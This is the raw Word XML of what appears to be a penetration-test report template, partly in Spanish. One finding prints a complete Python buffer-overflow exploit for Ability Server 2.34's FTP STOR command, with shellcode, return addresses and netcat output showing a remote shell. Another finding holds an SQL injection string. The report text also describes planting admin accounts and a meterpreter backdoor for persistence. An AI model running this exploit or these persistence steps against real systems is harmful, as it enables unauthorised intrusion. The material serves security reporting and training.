              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:pageBreakBefore/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
                <w:color w:val="4F81BD"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none" w:color="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Exploited:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none" w:color="4F81BD"/>
              </w:rPr>
              <w:t>Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">System Vulnerable: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>172.16.203.134</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Vulnerability Explanation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>: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pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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3">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink0"/>
                  <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                </w:rPr>
                <w:t>http://www.code-crafters.com/abilityserver/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FF0000"/>
                <w:u w:val="none" w:color="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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Ability Server 2.34 FTP STOR Buffer Overflow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Advanced, secure and easy to use FTP Server.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21 Oct 2004 - muts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D:\BO&gt;ability-2.34-ftp-stor.py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D:\data\tools&gt;nc -v 127.0.0.1 4444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localhost [127.0.0.1] 4444 (?) open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Microsoft Windows XP [Version 5.1.2600]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(C) Copyright 1985-2001 Microsoft Corp.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D:\Program Files\abilitywebserver&gt;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import ftplib</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from ftplib import FTP</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import struct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"\n\n################################"</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"\nAbility Server 2.34 FTP STOR buffer Overflow"</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print "\nFor Educational Purposes Only!\n"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Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"</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"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"</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"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"</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"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"</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"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"</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"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"</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"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"</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"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"</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"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"</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"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"</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"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"</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"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"</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"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"</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"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"</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"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"</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"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"</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"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"</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"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"</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"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"</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"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"</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"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"</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"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"</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"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"</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Change RET address if need be.</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buffer = '\x41'*966+struct.pack('&lt;L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4</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#buffer = '\x41'*970+struct.pack('&lt;L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2</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try:</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Edit the IP, Username and Password.</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ftp = FTP('127.0.0.1')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ftp.login('ftp','ftp')</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"\nEvil Buffer sent..."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"\nTry connecting with netcat to port 4444 on the remote machine."</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except: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"\nCould not Connect to FTP Server."</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try:</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ftp.transfercmd("STOR " + buffer)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except:</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"\nDone."</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Screenshot Here:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4638675" cy="2419350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Imagen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image.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId4"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4638675" cy="2419350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="325" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11234" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9355" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
                <w:color w:val="17375E"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none" w:color="17375E"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none" w:color="4F81BD"/>
              </w:rPr>
              <w:t>MySQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">System Vulnerable: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>172.16.203.135</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Vulnerability Explanation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>: A custom web application identified was prone to SQL Injection attacks. When performing the penetration test, John noticed error-based MySQL Injection on the taxid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pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>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pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FF0000"/>
                <w:u w:val="none" w:color="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Proof of Concept Code Here:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:pBdr>
                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE “%root%"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="192"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="192"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="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4" y="0"/>
                      <wp:lineTo x="-4" y="20600"/>
                      <wp:lineTo x="21450" y="20600"/>
                      <wp:lineTo x="21450" y="0"/>
                      <wp:lineTo x="-4"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625215" cy="419100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Screenshot Here:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="192" w:before="0" w:after="200"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="__RefHeading___Toc396_3166141552"/>
      <w:bookmarkStart w:id="20" w:name="_Toc59959356"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Obtención de flags</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John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="__RefHeading___Toc398_3166141552"/>
      <w:bookmarkStart w:id="22" w:name="_Toc59959357"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>inalización</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pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="__RefHeading___Toc400_3166141552"/>
      <w:bookmarkStart w:id="24" w:name="_Toc59959358"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">4.0 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
        <w:t>Apéndices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>This section is placed for any additional items that were not mentioned in the overall report.</w:t>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2"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="DejaVu Serif">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto">
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial Unicode M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pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9340" w:leader="none"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t>12</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spacing w:before="0" w:after="200"/>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>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0"/>
        </w:tabs>
        <w:ind w:left="288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0"/>
        </w:tabs>
        <w:ind w:left="504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keepLines/>
      <w:widowControl/>
      <w:pBdr/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="200" w:after="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17375E"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:val="none" w:color="17375E"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA"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Bolos">
    <w:name w:val="Bolos"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:eastAsia="OpenSymbol" w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enlacedelndice">
    <w:name w:val="Enlace del índice"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo" w:customStyle="1">
    <w:name w:val="Título"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:widowControl/>
      <w:pBdr/>
      <w:bidi w:val="0"/>
